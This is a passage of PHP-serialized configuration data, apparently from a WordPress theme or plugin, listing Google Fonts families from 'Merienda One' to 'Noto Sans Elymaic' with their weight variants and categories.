One\";a:3:{s:5:\"label\";s:12:\"Merienda One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:12:\"Merriweather\";a:3:{s:5:\"label\";s:12:\"Merriweather\";s:8:\"variants\";a:8:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";i:4;s:3:\"900\";i:5;s:9:\"900italic\";i:6;s:6:\"italic\";i:7;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:17:\"Merriweather Sans\";a:3:{s:5:\"label\";s:17:\"Merriweather Sans\";s:8:\"variants\";a:12:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"500\";i:3;s:9:\"500italic\";i:4;s:3:\"600\";i:5;s:9:\"600italic\";i:6;s:3:\"700\";i:7;s:9:\"700italic\";i:8;s:3:\"800\";i:9;s:9:\"800italic\";i:10;s:6:\"italic\";i:11;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Metal\";a:3:{s:5:\"label\";s:5:\"Metal\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Metal Mania\";a:3:{s:5:\"label\";s:11:\"Metal Mania\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Metamorphous\";a:3:{s:5:\"label\";s:12:\"Metamorphous\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Metrophobic\";a:3:{s:5:\"label\";s:11:\"Metrophobic\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:8:\"Michroma\";a:3:{s:5:\"label\";s:8:\"Michroma\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Milonga\";a:3:{s:5:\"label\";s:7:\"Milonga\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Miltonian\";a:3:{s:5:\"label\";s:9:\"Miltonian\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:16:\"Miltonian Tattoo\";a:3:{s:5:\"label\";s:16:\"Miltonian Tattoo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:4:\"Mina\";a:3:{s:5:\"label\";s:4:\"Mina\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Miniver\";a:3:{s:5:\"label\";s:7:\"Miniver\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Miriam Libre\";a:3:{s:5:\"label\";s:12:\"Miriam Libre\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Mirza\";a:3:{s:5:\"label\";s:5:\"Mirza\";s:8:\"variants\";a:4:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:14:\"Miss Fajardose\";a:3:{s:5:\"label\";s:14:\"Miss Fajardose\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:4:\"Mitr\";a:3:{s:5:\"label\";s:4:\"Mitr\";s:8:\"variants\";a:6:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:14:\"Mochiy Pop One\";a:3:{s:5:\"label\";s:14:\"Mochiy Pop One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"Mochiy Pop P One\";a:3:{s:5:\"label\";s:16:\"Mochiy Pop P One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Modak\";a:3:{s:5:\"label\";s:5:\"Modak\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:14:\"Modern Antiqua\";a:3:{s:5:\"label\";s:14:\"Modern Antiqua\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Mogra\";a:3:{s:5:\"label\";s:5:\"Mogra\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Mohave\";a:3:{s:5:\"label\";s:6:\"Mohave\";s:8:\"variants\";a:10:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"500\";i:3;s:9:\"500italic\";i:4;s:3:\"600\";i:5;s:9:\"600italic\";i:6;s:3:\"700\";i:7;s:9:\"700italic\";i:8;s:6:\"italic\";i:9;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Molengo\";a:3:{s:5:\"label\";s:7:\"Molengo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Molle\";a:3:{s:5:\"label\";s:5:\"Molle\";s:8:\"variants\";a:1:{i:0;s:6:\"italic\";}s:8:\"category\";s:11:\"handwriting\";}s:5:\"Monda\";a:3:{s:5:\"label\";s:5:\"Monda\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:8:\"Monofett\";a:3:{s:5:\"label\";s:8:\"Monofett\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Monoton\";a:3:{s:5:\"label\";s:7:\"Monoton\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:20:\"Monsieur La Doulaise\";a:3:{s:5:\"label\";s:20:\"Monsieur La Doulaise\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Montaga\";a:3:{s:5:\"label\";s:7:\"Montaga\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:12:\"Montagu Slab\";a:3:{s:5:\"label\";s:12:\"Montagu Slab\";s:8:\"variants\";a:7:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:10:\"MonteCarlo\";a:3:{s:5:\"label\";s:10:\"MonteCarlo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:6:\"Montez\";a:3:{s:5:\"label\";s:6:\"Montez\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:10:\"Montserrat\";a:3:{s:5:\"label\";s:10:\"Montserrat\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:21:\"Montserrat Alternates\";a:3:{s:5:\"label\";s:21:\"Montserrat Alternates\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:20:\"Montserrat Subrayada\";a:3:{s:5:\"label\";s:20:\"Montserrat Subrayada\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Moo Lah Lah\";a:3:{s:5:\"label\";s:11:\"Moo Lah Lah\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Moon Dance\";a:3:{s:5:\"label\";s:10:\"Moon Dance\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:4:\"Moul\";a:3:{s:5:\"label\";s:4:\"Moul\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:8:\"Moulpali\";a:3:{s:5:\"label\";s:8:\"Moulpali\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:22:\"Mountains of Christmas\";a:3:{s:5:\"label\";s:22:\"Mountains of Christmas\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:13:\"Mouse Memoirs\";a:3:{s:5:\"label\";s:13:\"Mouse Memoirs\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:10:\"Mr Bedfort\";a:3:{s:5:\"label\";s:10:\"Mr Bedfort\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:8:\"Mr Dafoe\";a:3:{s:5:\"label\";s:8:\"Mr Dafoe\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:14:\"Mr De Haviland\";a:3:{s:5:\"label\";s:14:\"Mr De Haviland\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:19:\"Mrs Saint Delafield\";a:3:{s:5:\"label\";s:19:\"Mrs Saint Delafield\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:13:\"Mrs Sheppards\";a:3:{s:5:\"label\";s:13:\"Mrs Sheppards\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:5:\"Mukta\";a:3:{s:5:\"label\";s:5:\"Mukta\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Mukta Mahee\";a:3:{s:5:\"label\";s:11:\"Mukta Mahee\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Mukta Malar\";a:3:{s:5:\"label\";s:11:\"Mukta Malar\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Mukta Vaani\";a:3:{s:5:\"label\";s:11:\"Mukta Vaani\";s:8:\"variants\";a:7:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Mulish\";a:3:{s:5:\"label\";s:6:\"Mulish\";s:8:\"variants\";a:16:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"500\";i:5;s:9:\"500italic\";i:6;s:3:\"600\";i:7;s:9:\"600italic\";i:8;s:3:\"700\";i:9;s:9:\"700italic\";i:10;s:3:\"800\";i:11;s:9:\"800italic\";i:12;s:3:\"900\";i:13;s:9:\"900italic\";i:14;s:6:\"italic\";i:15;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Murecho\";a:3:{s:5:\"label\";s:7:\"Murecho\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"MuseoModerno\";a:3:{s:5:\"label\";s:12:\"MuseoModerno\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:13:\"Mystery Quest\";a:3:{s:5:\"label\";s:13:\"Mystery Quest\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:3:\"NTR\";a:3:{s:5:\"label\";s:3:\"NTR\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:18:\"Nanum Brush Script\";a:3:{s:5:\"label\";s:18:\"Nanum Brush Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:12:\"Nanum Gothic\";a:3:{s:5:\"label\";s:12:\"Nanum Gothic\";s:8:\"variants\";a:3:{i:0;s:3:\"700\";i:1;s:3:\"800\";i:2;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:19:\"Nanum Gothic Coding\";a:3:{s:5:\"label\";s:19:\"Nanum Gothic Coding\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:9:\"monospace\";}s:14:\"Nanum Myeongjo\";a:3:{s:5:\"label\";s:14:\"Nanum Myeongjo\";s:8:\"variants\";a:3:{i:0;s:3:\"700\";i:1;s:3:\"800\";i:2;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:16:\"Nanum Pen Script\";a:3:{s:5:\"label\";s:16:\"Nanum Pen Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:9:\"Nerko One\";a:3:{s:5:\"label\";s:9:\"Nerko One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:6:\"Neucha\";a:3:{s:5:\"label\";s:6:\"Neucha\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:6:\"Neuton\";a:3:{s:5:\"label\";s:6:\"Neuton\";s:8:\"variants\";a:6:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:6:\"italic\";i:5;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:10:\"New Rocker\";a:3:{s:5:\"label\";s:10:\"New Rocker\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"New Tegomin\";a:3:{s:5:\"label\";s:11:\"New Tegomin\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:10:\"News Cycle\";a:3:{s:5:\"label\";s:10:\"News Cycle\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:10:\"Newsreader\";a:3:{s:5:\"label\";s:10:\"Newsreader\";s:8:\"variants\";a:14:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"500\";i:5;s:9:\"500italic\";i:6;s:3:\"600\";i:7;s:9:\"600italic\";i:8;s:3:\"700\";i:9;s:9:\"700italic\";i:10;s:3:\"800\";i:11;s:9:\"800italic\";i:12;s:6:\"italic\";i:13;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:7:\"Niconne\";a:3:{s:5:\"label\";s:7:\"Niconne\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Niramit\";a:3:{s:5:\"label\";s:7:\"Niramit\";s:8:\"variants\";a:12:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"500\";i:5;s:9:\"500italic\";i:6;s:3:\"600\";i:7;s:9:\"600italic\";i:8;s:3:\"700\";i:9;s:9:\"700italic\";i:10;s:6:\"italic\";i:11;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Nixie One\";a:3:{s:5:\"label\";s:9:\"Nixie One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Nobile\";a:3:{s:5:\"label\";s:6:\"Nobile\";s:8:\"variants\";a:6:{i:0;s:3:\"500\";i:1;s:9:\"500italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";i:4;s:6:\"italic\";i:5;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Nokora\";a:3:{s:5:\"label\";s:6:\"Nokora\";s:8:\"variants\";a:5:{i:0;s:3:\"100\";i:1;s:3:\"300\";i:2;s:3:\"700\";i:3;s:3:\"900\";i:4;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Norican\";a:3:{s:5:\"label\";s:7:\"Norican\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Nosifer\";a:3:{s:5:\"label\";s:7:\"Nosifer\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Notable\";a:3:{s:5:\"label\";s:7:\"Notable\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:20:\"Nothing You Could Do\";a:3:{s:5:\"label\";s:20:\"Nothing You Could Do\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:12:\"Noticia Text\";a:3:{s:5:\"label\";s:12:\"Noticia Text\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:16:\"Noto Kufi Arabic\";a:3:{s:5:\"label\";s:16:\"Noto Kufi Arabic\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:10:\"Noto Music\";a:3:{s:5:\"label\";s:10:\"Noto Music\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:17:\"Noto Naskh Arabic\";a:3:{s:5:\"label\";s:17:\"Noto Naskh Arabic\";s:8:\"variants\";a:4:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:18:\"Noto Nastaliq Urdu\";a:3:{s:5:\"label\";s:18:\"Noto Nastaliq Urdu\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:17:\"Noto Rashi Hebrew\";a:3:{s:5:\"label\";s:17:\"Noto Rashi Hebrew\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:9:\"Noto Sans\";a:3:{s:5:\"label\";s:9:\"Noto Sans\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:15:\"Noto Sans Adlam\";a:3:{s:5:\"label\";s:15:\"Noto Sans Adlam\";s:8:\"variants\";a:4:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:24:\"Noto Sans Adlam Unjoined\";a:3:{s:5:\"label\";s:24:\"Noto Sans Adlam Unjoined\";s:8:\"variants\";a:4:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:31:\"Noto Sans Anatolian Hieroglyphs\";a:3:{s:5:\"label\";s:31:\"Noto Sans Anatolian Hieroglyphs\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"Noto Sans Arabic\";a:3:{s:5:\"label\";s:16:\"Noto Sans Arabic\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:18:\"Noto Sans Armenian\";a:3:{s:5:\"label\";s:18:\"Noto Sans Armenian\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:17:\"Noto Sans Avestan\";a:3:{s:5:\"label\";s:17:\"Noto Sans Avestan\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:18:\"Noto Sans Balinese\";a:3:{s:5:\"label\";s:18:\"Noto Sans Balinese\";s:8:\"variants\";a:4:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:15:\"Noto Sans Bamum\";a:3:{s:5:\"label\";s:15:\"Noto Sans Bamum\";s:8:\"variants\";a:4:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:19:\"Noto Sans Bassa Vah\";a:3:{s:5:\"label\";s:19:\"Noto Sans Bassa Vah\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:15:\"Noto Sans Batak\";a:3:{s:5:\"label\";s:15:\"Noto Sans Batak\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:17:\"Noto Sans Bengali\";a:3:{s:5:\"label\";s:17:\"Noto Sans Bengali\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:19:\"Noto Sans Bhaiksuki\";a:3:{s:5:\"label\";s:19:\"Noto Sans Bhaiksuki\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"Noto Sans Brahmi\";a:3:{s:5:\"label\";s:16:\"Noto Sans Brahmi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:18:\"Noto Sans Buginese\";a:3:{s:5:\"label\";s:18:\"Noto Sans Buginese\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:15:\"Noto Sans Buhid\";a:3:{s:5:\"label\";s:15:\"Noto Sans Buhid\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:29:\"Noto Sans Canadian Aboriginal\";a:3:{s:5:\"label\";s:29:\"Noto Sans Canadian Aboriginal\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"Noto Sans Carian\";a:3:{s:5:\"label\";s:16:\"Noto Sans Carian\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:28:\"Noto Sans Caucasian Albanian\";a:3:{s:5:\"label\";s:28:\"Noto Sans Caucasian Albanian\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"Noto Sans Chakma\";a:3:{s:5:\"label\";s:16:\"Noto Sans Chakma\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:14:\"Noto Sans Cham\";a:3:{s:5:\"label\";s:14:\"Noto Sans Cham\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:18:\"Noto Sans Cherokee\";a:3:{s:5:\"label\";s:18:\"Noto Sans Cherokee\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"Noto Sans Coptic\";a:3:{s:5:\"label\";s:16:\"Noto Sans Coptic\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:19:\"Noto Sans Cuneiform\";a:3:{s:5:\"label\";s:19:\"Noto Sans Cuneiform\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:17:\"Noto Sans Cypriot\";a:3:{s:5:\"label\";s:17:\"Noto Sans Cypriot\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:17:\"Noto Sans Deseret\";a:3:{s:5:\"label\";s:17:\"Noto Sans Deseret\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:20:\"Noto Sans Devanagari\";a:3:{s:5:\"label\";s:20:\"Noto Sans Devanagari\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:17:\"Noto Sans Display\";a:3:{s:5:\"label\";s:17:\"Noto Sans Display\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:18:\"Noto Sans Duployan\";a:3:{s:5:\"label\";s:18:\"Noto Sans Duployan\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:30:\"Noto Sans Egyptian Hieroglyphs\";a:3:{s:5:\"label\";s:30:\"Noto Sans Egyptian Hieroglyphs\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:17:\"Noto Sans Elbasan\";a:3:{s:5:\"label\";s:17:\"Noto Sans Elbasan\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:17:\"Noto Sans Elymaic\";a:3:{s:5:\"label\";s:17:\"Noto Sans 